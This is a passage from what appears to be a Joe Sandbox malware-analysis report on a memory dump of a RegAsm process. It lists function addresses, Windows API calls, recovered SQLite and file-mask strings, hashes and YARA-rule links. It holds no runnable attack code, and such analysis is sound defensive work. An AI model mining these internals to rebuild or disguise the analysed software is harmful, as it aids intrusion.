                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                Download Yara Rule
                                                APIs
                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                • memset.MSVCRT ref: 0041BA3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: -journal$-wal
                                                • API String ID: 438689982-2894717839
                                                • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: gj
                                                • API String ID: 438689982-4203073231
                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                • String ID: 0$6
                                                • API String ID: 2029023288-3849865405
                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                • memset.MSVCRT ref: 00405455
                                                • memset.MSVCRT ref: 0040546C
                                                • memset.MSVCRT ref: 00405483
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$memcpy$ErrorLast
                                                • String ID: 6$\
                                                • API String ID: 404372293-1284684873
                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: AttributesErrorFileLastSleep$free
                                                • String ID:
                                                • API String ID: 1470729244-0
                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                • wcscat.MSVCRT ref: 0040A0E6
                                                • wcscat.MSVCRT ref: 0040A0F5
                                                • wcscpy.MSVCRT ref: 0040A107
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                • String ID:
                                                • API String ID: 1331804452-0
                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                • <%s>, xrefs: 004100A6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                • API String ID: 3473751417-2880344631
                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset
                                                • String ID: %2.2X
                                                • API String ID: 2521778956-791839006
                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _snwprintfwcscpy
                                                • String ID: dialog_%d$general$menu_%d$strings
                                                • API String ID: 999028693-502967061
                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                • memset.MSVCRT ref: 0040C439
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                • _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                • memset.MSVCRT ref: 0040C4D0
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                • String ID:
                                                • API String ID: 4131475296-0
                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004116FF
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                • API String ID: 2618321458-3614832568
                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: AttributesFilefreememset
                                                • String ID:
                                                • API String ID: 2507021081-0
                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                • malloc.MSVCRT ref: 00417524
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                • free.MSVCRT ref: 00417544
                                                • free.MSVCRT ref: 00417562
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                • String ID:
                                                • API String ID: 4131324427-0
                                                • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                • free.MSVCRT ref: 0041822B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PathTemp$free
                                                • String ID: %s\etilqs_$etilqs_
                                                • API String ID: 924794160-1420421710
                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLastMessage_snwprintf
                                                • String ID: Error$Error %d: %s
                                                • API String ID: 313946961-1552265934
                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                • API String ID: 3510742995-272990098
                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0044A6EB
                                                • memset.MSVCRT ref: 0044A6FB
                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: gj
                                                • API String ID: 1297977491-4203073231
                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                • malloc.MSVCRT ref: 004174BD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                • free.MSVCRT ref: 004174E4
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                • String ID:
                                                • API String ID: 4053608372-0
                                                • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 0040D453
                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Window$Rect$ClientParentPoints
                                                • String ID:
                                                • API String ID: 4247780290-0
                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                • memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                • String ID:
                                                • API String ID: 1471605966-0
                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcscpy.MSVCRT ref: 0044475F
                                                • wcscat.MSVCRT ref: 0044476E
                                                • wcscat.MSVCRT ref: 0044477F
                                                • wcscat.MSVCRT ref: 0044478E
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                Strings
                                                Memory Dump Source
